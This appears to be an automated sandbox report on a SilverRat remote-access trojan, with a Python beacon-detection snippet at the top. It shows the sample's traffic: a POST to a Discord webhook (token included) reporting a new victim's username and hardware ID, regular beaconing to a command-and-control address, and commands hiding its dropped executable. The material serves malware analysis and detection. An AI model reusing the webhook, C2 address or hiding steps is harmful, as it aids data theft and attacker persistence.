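def find_beacons(rows, min_connections=5, max_jitter=0.2, local_ip=LOCAL_IP):
    """Remote endpoints reconnected to at a steady cadence: at least min_connections
    connections whose inter-arrival coefficient of variation is at most max_jitter."""
    by_remote = defaultdict(list)
    for (sport, dst, dport), ts in connection_starts(rows, local_ip).items():
        by_remote[(dst, dport)].append(ts)
    beacons = []
    for (dst, dport), times in by_remote.items():
        if len(times) < min_connections:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            beacons.append({"remote": f"{dst}:{dport}", "connections": len(times),
                            "interval_s": round(avg, 2), "nonstandard_port": dport not in (80, 443)})
    return beacons


if __name__ == "__main__":
    for b in find_beacons(parse_rows(SAMPLE_ROWS)):
        print(b)
```

The single 162.159.133.233:443 connection is left alone by the threshold; the ten reconnects to 147.185.221.23:52996 come out with an interval of about 8.5 s and almost no jitter, which is the fingerprint a beacon-interval detection keys on.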
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Nov 9, 2024 22:53:11.859798908 CET | 49710 | 443 | 192.168.2.6 | 162.159.133.233 |
| Nov 9, 2024 22:53:11.859850883 CET | 443 | 49710 | 162.159.133.233 | 192.168.2.6 |
| Nov 9, 2024 22:53:11.859913111 CET | 49710 | 443 | 192.168.2.6 | 162.159.133.233 |
| Nov 9, 2024 22:53:11.871438026 CET | 49710 | 443 | 192.168.2.6 | 162.159.133.233 |
| Nov 9, 2024 22:53:11.871454000 CET | 443 | 49710 | 162.159.133.233 | 192.168.2.6 |
| Nov 9, 2024 22:53:12.488956928 CET | 443 | 49710 | 162.159.133.233 | 192.168.2.6 |
| Nov 9, 2024 22:53:12.489022970 CET | 49710 | 443 | 192.168.2.6 | 162.159.133.233 |
| Nov 9, 2024 22:53:12.491710901 CET | 49710 | 443 | 192.168.2.6 | 162.159.133.233 |
| Nov 9, 2024 22:53:12.491719007 CET | 443 | 49710 | 162.159.133.233 | 192.168.2.6 |
| Nov 9, 2024 22:53:12.492117882 CET | 443 | 49710 | 162.159.133.233 | 192.168.2.6 |
| Nov 9, 2024 22:53:12.529386997 CET | 49710 | 443 | 192.168.2.6 | 162.159.133.233 |
| Nov 9, 2024 22:53:12.575335979 CET | 443 | 49710 | 162.159.133.233 | 192.168.2.6 |
| Nov 9, 2024 22:53:12.654032946 CET | 443 | 49710 | 162.159.133.233 | 192.168.2.6 |
| Nov 9, 2024 22:53:12.654521942 CET | 49710 | 443 | 192.168.2.6 | 162.159.133.233 |
| Nov 9, 2024 22:53:12.654535055 CET | 443 | 49710 | 162.159.133.233 | 192.168.2.6 |
| Nov 9, 2024 22:53:12.864989996 CET | 443 | 49710 | 162.159.133.233 | 192.168.2.6 |
| Nov 9, 2024 22:53:12.865133047 CET | 443 | 49710 | 162.159.133.233 | 192.168.2.6 |
| Nov 9, 2024 22:53:12.865629911 CET | 49710 | 443 | 192.168.2.6 | 162.159.133.233 |
| Nov 9, 2024 22:53:12.867834091 CET | 49710 | 443 | 192.168.2.6 | 162.159.133.233 |
| Nov 9, 2024 22:53:12.919152975 CET | 49711 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:53:12.925348997 CET | 52996 | 49711 | 147.185.221.23 | 192.168.2.6 |
| Nov 9, 2024 22:53:12.925422907 CET | 49711 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:53:12.926789999 CET | 49711 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:53:12.932646036 CET | 52996 | 49711 | 147.185.221.23 | 192.168.2.6 |
| Nov 9, 2024 22:53:21.415589094 CET | 52996 | 49711 | 147.185.221.23 | 192.168.2.6 |
| Nov 9, 2024 22:53:21.415678978 CET | 49711 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:53:21.435461044 CET | 49711 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:53:21.436254978 CET | 49744 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:53:21.440318108 CET | 52996 | 49711 | 147.185.221.23 | 192.168.2.6 |
| Nov 9, 2024 22:53:21.441199064 CET | 52996 | 49744 | 147.185.221.23 | 192.168.2.6 |
| Nov 9, 2024 22:53:21.441266060 CET | 49744 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:53:21.441478014 CET | 49744 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:53:21.446201086 CET | 52996 | 49744 | 147.185.221.23 | 192.168.2.6 |
| Nov 9, 2024 22:53:29.927369118 CET | 52996 | 49744 | 147.185.221.23 | 192.168.2.6 |
| Nov 9, 2024 22:53:29.927434921 CET | 49744 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:53:29.936026096 CET | 49744 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:53:29.937568903 CET | 49796 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:53:29.940861940 CET | 52996 | 49744 | 147.185.221.23 | 192.168.2.6 |
| Nov 9, 2024 22:53:29.942419052 CET | 52996 | 49796 | 147.185.221.23 | 192.168.2.6 |
| Nov 9, 2024 22:53:29.942497969 CET | 49796 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:53:29.948149920 CET | 49796 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:53:29.953193903 CET | 52996 | 49796 | 147.185.221.23 | 192.168.2.6 |
| Nov 9, 2024 22:53:38.426225901 CET | 52996 | 49796 | 147.185.221.23 | 192.168.2.6 |
| Nov 9, 2024 22:53:38.426304102 CET | 49796 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:53:38.435703993 CET | 49796 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:53:38.436532021 CET | 49846 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:53:38.440502882 CET | 52996 | 49796 | 147.185.221.23 | 192.168.2.6 |
| Nov 9, 2024 22:53:38.441293955 CET | 52996 | 49846 | 147.185.221.23 | 192.168.2.6 |
| Nov 9, 2024 22:53:38.441374063 CET | 49846 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:53:38.441663980 CET | 49846 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:53:38.446433067 CET | 52996 | 49846 | 147.185.221.23 | 192.168.2.6 |
| Nov 9, 2024 22:53:46.941847086 CET | 52996 | 49846 | 147.185.221.23 | 192.168.2.6 |
| Nov 9, 2024 22:53:46.941926003 CET | 49846 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:53:46.951225996 CET | 49846 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:53:46.952044964 CET | 49895 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:53:46.955943108 CET | 52996 | 49846 | 147.185.221.23 | 192.168.2.6 |
| Nov 9, 2024 22:53:46.956789017 CET | 52996 | 49895 | 147.185.221.23 | 192.168.2.6 |
| Nov 9, 2024 22:53:46.956859112 CET | 49895 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:53:46.957066059 CET | 49895 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:53:46.961765051 CET | 52996 | 49895 | 147.185.221.23 | 192.168.2.6 |
| Nov 9, 2024 22:53:55.437702894 CET | 52996 | 49895 | 147.185.221.23 | 192.168.2.6 |
| Nov 9, 2024 22:53:55.437894106 CET | 49895 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:53:55.451294899 CET | 49895 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:53:55.452280045 CET | 60607 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:53:55.456650019 CET | 52996 | 49895 | 147.185.221.23 | 192.168.2.6 |
| Nov 9, 2024 22:53:55.458070993 CET | 52996 | 60607 | 147.185.221.23 | 192.168.2.6 |
| Nov 9, 2024 22:53:55.458136082 CET | 60607 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:53:55.458353043 CET | 60607 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:53:55.463052988 CET | 52996 | 60607 | 147.185.221.23 | 192.168.2.6 |
| Nov 9, 2024 22:54:03.959096909 CET | 52996 | 60607 | 147.185.221.23 | 192.168.2.6 |
| Nov 9, 2024 22:54:03.959160089 CET | 60607 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:54:03.967592955 CET | 60607 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:54:03.968588114 CET | 60653 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:54:03.972397089 CET | 52996 | 60607 | 147.185.221.23 | 192.168.2.6 |
| Nov 9, 2024 22:54:03.973416090 CET | 52996 | 60653 | 147.185.221.23 | 192.168.2.6 |
| Nov 9, 2024 22:54:03.973474979 CET | 60653 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:54:03.973711014 CET | 60653 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:54:03.978511095 CET | 52996 | 60653 | 147.185.221.23 | 192.168.2.6 |
| Nov 9, 2024 22:54:12.458875895 CET | 52996 | 60653 | 147.185.221.23 | 192.168.2.6 |
| Nov 9, 2024 22:54:12.458940983 CET | 60653 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:54:12.467040062 CET | 60653 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:54:12.468058109 CET | 60654 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:54:12.471813917 CET | 52996 | 60653 | 147.185.221.23 | 192.168.2.6 |
| Nov 9, 2024 22:54:12.472872019 CET | 52996 | 60654 | 147.185.221.23 | 192.168.2.6 |
| Nov 9, 2024 22:54:12.472949982 CET | 60654 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:54:12.473207951 CET | 60654 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:54:12.478013992 CET | 52996 | 60654 | 147.185.221.23 | 192.168.2.6 |
| Nov 9, 2024 22:54:20.977060080 CET | 52996 | 60654 | 147.185.221.23 | 192.168.2.6 |
| Nov 9, 2024 22:54:20.977197886 CET | 60654 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:54:20.982736111 CET | 60654 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:54:20.983802080 CET | 60656 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:54:20.987524033 CET | 52996 | 60654 | 147.185.221.23 | 192.168.2.6 |
| Nov 9, 2024 22:54:20.988616943 CET | 52996 | 60656 | 147.185.221.23 | 192.168.2.6 |
| Nov 9, 2024 22:54:20.988683939 CET | 60656 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:54:20.988922119 CET | 60656 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:54:20.993762016 CET | 52996 | 60656 | 147.185.221.23 | 192.168.2.6 |
| Nov 9, 2024 22:54:29.469165087 CET | 52996 | 60656 | 147.185.221.23 | 192.168.2.6 |
| Nov 9, 2024 22:54:29.469237089 CET | 60656 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:54:29.482856035 CET | 60656 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:54:29.483941078 CET | 60658 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:54:29.488140106 CET | 52996 | 60656 | 147.185.221.23 | 192.168.2.6 |
| Nov 9, 2024 22:54:29.490359068 CET | 52996 | 60658 | 147.185.221.23 | 192.168.2.6 |
| Nov 9, 2024 22:54:29.490461111 CET | 60658 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:54:29.494554996 CET | 60658 | 52996 | 192.168.2.6 | 147.185.221.23 |
| Nov 9, 2024 22:54:29.499610901 CET | 52996 | 60658 | 147.185.221.23 | 192.168.2.6 |
| Nov 9, 2024 22:54:37.975286007 CET | 52996 | 60658 | 147.185.221.23 | 192.168.2.6 |
| Nov 9, 2024 22:54:37.975403070 CET | 60658 | 52996 | 192.168.2.6 | 147.185.221.23 |
                                                    Nov 9, 2024 22:54:37.982820988 CET6065852996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:37.983861923 CET6065952996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:37.988569975 CET5299660658147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:54:37.989675045 CET5299660659147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:54:37.989748955 CET6065952996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:37.990014076 CET6065952996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:37.995841026 CET5299660659147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:54:46.494982004 CET5299660659147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:54:46.495155096 CET6065952996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:46.514100075 CET6065952996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:46.514834881 CET6066152996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:46.519066095 CET5299660659147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:54:46.519609928 CET5299660661147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:54:46.519773006 CET6066152996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:46.520029068 CET6066152996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:46.525074005 CET5299660661147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:54:55.018409967 CET5299660661147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:54:55.018503904 CET6066152996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:55.029967070 CET6066152996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:55.031124115 CET6066252996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:55.034796953 CET5299660661147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:54:55.035959959 CET5299660662147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:54:55.036032915 CET6066252996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:55.036293983 CET6066252996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:54:55.041069031 CET5299660662147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:55:03.543710947 CET5299660662147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:55:03.543836117 CET6066252996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:55:03.596707106 CET6066252996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:55:03.600910902 CET6066352996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:55:03.601502895 CET5299660662147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:55:03.605804920 CET5299660663147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:55:03.605875969 CET6066352996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:55:03.609133959 CET6066352996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:55:03.614006996 CET5299660663147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:55:12.081427097 CET5299660663147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:55:12.081532001 CET6066352996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:55:12.092396975 CET6066352996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:55:12.093103886 CET6066552996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:55:12.097259998 CET5299660663147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:55:12.097898960 CET5299660665147.185.221.23192.168.2.6
                                                    Nov 9, 2024 22:55:12.097975016 CET6066552996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:55:12.098181963 CET6066552996192.168.2.6147.185.221.23
                                                    Nov 9, 2024 22:55:12.102968931 CET5299660665147.185.221.23192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 9, 2024 22:53:11.840869904 CET | 50432 | 53 | 192.168.2.6 | 1.1.1.1
Nov 9, 2024 22:53:11.847824097 CET | 53 | 50432 | 1.1.1.1 | 192.168.2.6
Nov 9, 2024 22:53:12.885133982 CET | 50815 | 53 | 192.168.2.6 | 1.1.1.1
Nov 9, 2024 22:53:12.917999983 CET | 53 | 50815 | 1.1.1.1 | 192.168.2.6
Nov 9, 2024 22:53:48.584686995 CET | 53 | 64297 | 162.159.36.2 | 192.168.2.6
Nov 9, 2024 22:53:49.345084906 CET | 53 | 58609 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 9, 2024 22:53:11.840869904 CET | 192.168.2.6 | 1.1.1.1 | 0x8af2 | Standard query (0) | discordapp.com | A (IP address) | IN (0x0001) | false
Nov 9, 2024 22:53:12.885133982 CET | 192.168.2.6 | 1.1.1.1 | 0x6a5b | Standard query (0) | 23.ip.gl.ply.gg | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 9, 2024 22:53:11.847824097 CET | 1.1.1.1 | 192.168.2.6 | 0x8af2 | No error (0) | discordapp.com | | 162.159.133.233 | A (IP address) | IN (0x0001) | false
Nov 9, 2024 22:53:11.847824097 CET | 1.1.1.1 | 192.168.2.6 | 0x8af2 | No error (0) | discordapp.com | | 162.159.134.233 | A (IP address) | IN (0x0001) | false
Nov 9, 2024 22:53:11.847824097 CET | 1.1.1.1 | 192.168.2.6 | 0x8af2 | No error (0) | discordapp.com | | 162.159.130.233 | A (IP address) | IN (0x0001) | false
Nov 9, 2024 22:53:11.847824097 CET | 1.1.1.1 | 192.168.2.6 | 0x8af2 | No error (0) | discordapp.com | | 162.159.129.233 | A (IP address) | IN (0x0001) | false
Nov 9, 2024 22:53:11.847824097 CET | 1.1.1.1 | 192.168.2.6 | 0x8af2 | No error (0) | discordapp.com | | 162.159.135.233 | A (IP address) | IN (0x0001) | false
Nov 9, 2024 22:53:12.917999983 CET | 1.1.1.1 | 192.168.2.6 | 0x6a5b | No error (0) | 23.ip.gl.ply.gg | | 147.185.221.23 | A (IP address) | IN (0x0001) | false
                                                    • discordapp.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49710 | 162.159.133.233 | 443 | 2940 | C:\Users\user\java\$77java.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-09 21:53:12 UTC | 258 | OUT | POST /api/webhooks/1294921166322139216/xs9PPlodeSrCXniTlxP1AWYgIlBu-KYxj9_7pK95qOS4ZhheXZuWsNfenaXEjnMgG__0 HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: discordapp.com
                                                    Content-Length: 415
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
2024-11-09 21:53:12 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-11-09 21:53:12 UTC | 415 | OUT | Data Raw: 75 73 65 72 6e 61 6d 65 3d 48 65 79 2b 41 44 4d 49 4e 26 61 76 61 74 61 72 5f 75 72 6c 3d 68 74 74 70 73 25 33 61 25 32 66 25 32 66 67 2e 74 6f 70 34 74 6f 70 2e 69 6f 25 32 66 70 5f 32 35 32 32 63 37 77 38 75 31 2e 70 6e 67 26 63 6f 6e 74 65 6e 74 3d 59 6f 75 2b 68 61 76 65 2b 61 2b 63 6c 69 65 6e 74 2b 6f 6e 6c 69 6e 65 2b 6e 6f 77 2b 25 37 62 2b 4e 65 77 2b 25 37 64 25 30 61 2b 2b 25 65 32 25 39 63 25 38 35 2b 55 73 65 72 6e 61 6d 65 2b 25 33 61 2b 65 6e 67 69 6e 65 65 72 25 34 30 38 32 30 30 39 34 25 30 61 2b 2b 25 65 32 25 39 63 25 38 35 2b 53 79 73 74 65 6d 2b 25 33 61 2b 4d 69 63 72 6f 73 6f 66 74 2b 57 69 6e 64 6f 77 73 2b 31 30 2b 50 72 6f 25 30 61 2b 2b 25 65 32 25 39 63 25 38 35 2b 48 57 49 44 2b 25 33 61 2b 42 33 42 37 39 32 42 35 41 45 46 32
                                                    Data Ascii: username=Hey+ADMIN&avatar_url=https%3a%2f%2fg.top4top.io%2fp_2522c7w8u1.png&content=You+have+a+client+online+now+%7b+New+%7d%0a++%e2%9c%85+Username+%3a+user%40820094%0a++%e2%9c%85+System+%3a+Microsoft+Windows+10+Pro%0a++%e2%9c%85+HWID+%3a+B3B792B5AEF2
2024-11-09 21:53:12 UTC | 1369 | IN | HTTP/1.1 204 No Content
                                                    Date: Sat, 09 Nov 2024 21:53:12 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    Set-Cookie: __dcfduid=0440756c9ee511ef9dce22f671cd9b78; Expires=Thu, 08-Nov-2029 21:53:12 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                    strict-transport-security: max-age=31536000; includeSubDomains
                                                    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                    x-ratelimit-limit: 5
                                                    x-ratelimit-remaining: 4
                                                    x-ratelimit-reset: 1731189194
                                                    x-ratelimit-reset-after: 1
                                                    via: 1.1 google
                                                    alt-svc: h3=":443"; ma=86400
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MR%2FJPhnTNICZUTqj7%2B2WyRWzGw7NIUlqeT5LR42PE9E7Y4Kdxdjxt0LYDxEdRrisXTpyKpscAPrv2vIk0Sct5A7sbh7Vqee0ywGL71bEUvsdzg8Z0ZN2cTubpfM7sDUQ"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Set-Cookie: __sdcfduid=0440756c9ee511ef9dce22f671cd9b780982e4e6b29938b88e52212f8e311e7cc0541e339f89f1d4297bda8db9220e58; Expires=Thu, 08-Nov-2029 21:53:12 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                    Set-Cookie: __cf_bm=.n7orT0CeLB9_jwYWUnaH215jUop7bVehYTUYt_uzIc-1731189192-1.0.1.1-YU4rtnQ7wuVHDl5.IlJDPVfY.Xv87cvSZVkEoayK1_sioIHzzXiH98R.XKBrlOoxMQCvkJdgwk3UnMT6_1QnxQ; path=/; expires=Sat, 09-Nov-24 22:23:12 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                    Se
2024-11-09 21:53:12 UTC | 351 | IN | Data Raw: 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 72 75 69 64 3d 38 30 64 65 39 62 66 62 38 64 38 33 65 37 38 31 35 39 65 30 63 65 39 32 35 30 62 66 63 32 37 36 30 66 63 32 39 33 33 37 2d 31 37 33 31 31 38 39 31 39 32 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 6c 7a 51 5f 65 76 6a 66 33 33 43 74 44 43 66 76 38 6d 39 57 72 6d 79 76 4e 56 69 64 61 46 69 49 77 43 41 47 6a 46 36 38 78 6e 63 2d 31 37 33 31 31 38 39 31 39 32 38 30 30 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f
                                                    Data Ascii: t-Cookie: __cfruid=80de9bfb8d83e78159e0ce9250bfc2760fc29337-1731189192; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneSet-Cookie: _cfuvid=lzQ_evjf33CtDCfv8m9WrmyvNVidaFiIwCAGjF68xnc-1731189192800-0.0.1.1-604800000; path=/; domain=.disco

                                                    Target ID:0
                                                    Start time:16:53:04
                                                    Start date:09/11/2024
                                                    Path:C:\Users\user\Desktop\RLesaPFXew.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\Desktop\RLesaPFXew.exe"
                                                    Imagebase:0x1d0000
                                                    File size:46'592 bytes
                                                    MD5 hash:537B270C2278044E4C3958530F745ECE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_SilverRat, Description: Yara detected SilverRat, Source: 00000000.00000000.2129565272.00000000001D2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_SilverRat, Description: Yara detected SilverRat, Source: 00000000.00000002.2158375099.0000000003AE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:6
                                                    Start time:16:53:07
                                                    Start date:09/11/2024
                                                    Path:C:\Windows\System32\attrib.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\java"
                                                    Imagebase:0x7ff7721d0000
                                                    File size:23'040 bytes
                                                    MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:7
                                                    Start time:16:53:07
                                                    Start date:09/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff66e660000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:8
                                                    Start time:16:53:07
                                                    Start date:09/11/2024
                                                    Path:C:\Windows\System32\attrib.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\java\$77java.exe"
                                                    Imagebase:0x7ff7721d0000
                                                    File size:23'040 bytes
                                                    MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:9
                                                    Start time:16:53:07
                                                    Start date:09/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff66e660000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:10
                                                    Start time:16:53:07
                                                    Start date:09/11/2024
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp4B52.tmp.bat""
                                                    Imagebase:0x7ff72bb10000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:11
                                                    Start time:16:53:07
                                                    Start date:09/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff66e660000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:12
                                                    Start time:16:53:07
                                                    Start date:09/11/2024
                                                    Path:C:\Windows\System32\timeout.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:timeout 3
                                                    Imagebase:0x7ff74dd30000
                                                    File size:32'768 bytes
                                                    MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:13
                                                    Start time:16:53:10
                                                    Start date:09/11/2024
                                                    Path:C:\Users\user\java\$77java.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\java\$77java.exe"
                                                    Imagebase:0x760000
                                                    File size:46'592 bytes
                                                    MD5 hash:537B270C2278044E4C3958530F745ECE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
